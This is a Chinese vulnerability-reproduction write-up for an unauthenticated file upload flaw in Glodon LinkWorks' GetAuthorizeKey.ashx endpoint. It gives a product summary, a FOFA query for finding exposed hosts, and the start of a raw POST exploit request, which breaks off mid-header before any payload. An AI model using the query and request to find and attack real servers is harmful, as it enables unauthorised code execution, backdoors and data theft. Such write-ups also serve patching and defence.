广联达Linkworks GetAuthorizeKey.ashx 文件上传漏洞复现

0x01 产品简介

广联达 LinkWorks（也称为 GlinkLink 或 GTP-LinkWorks）是广联达公司（Glodon）开发的一种BIM（建筑信息模型）协同平台。广联达是中国领先的数字建造技术提供商之一，专注于为建筑、工程和建筑设计行业提供数字化解决方案。

0x02 漏洞概述

  由于广联达 LinkWorks /Services/FileService/UserFiles/GetAuthorizeKey.ashx接口处设置不当，未经身份认证的攻击者通过该漏洞上传恶意文件，可导致恶意代码执行、身份伪造、后门植入、敏感数据泄露，服务器被控等问题。

0x03 复现环境

FOFA：

body="Services/Identification/login.ashx" || header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

0x04 漏洞复现 

创建文件并获取上传授权码

POST /Services/FileService/UserFiles/GetAuthorizeKey.ashx HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (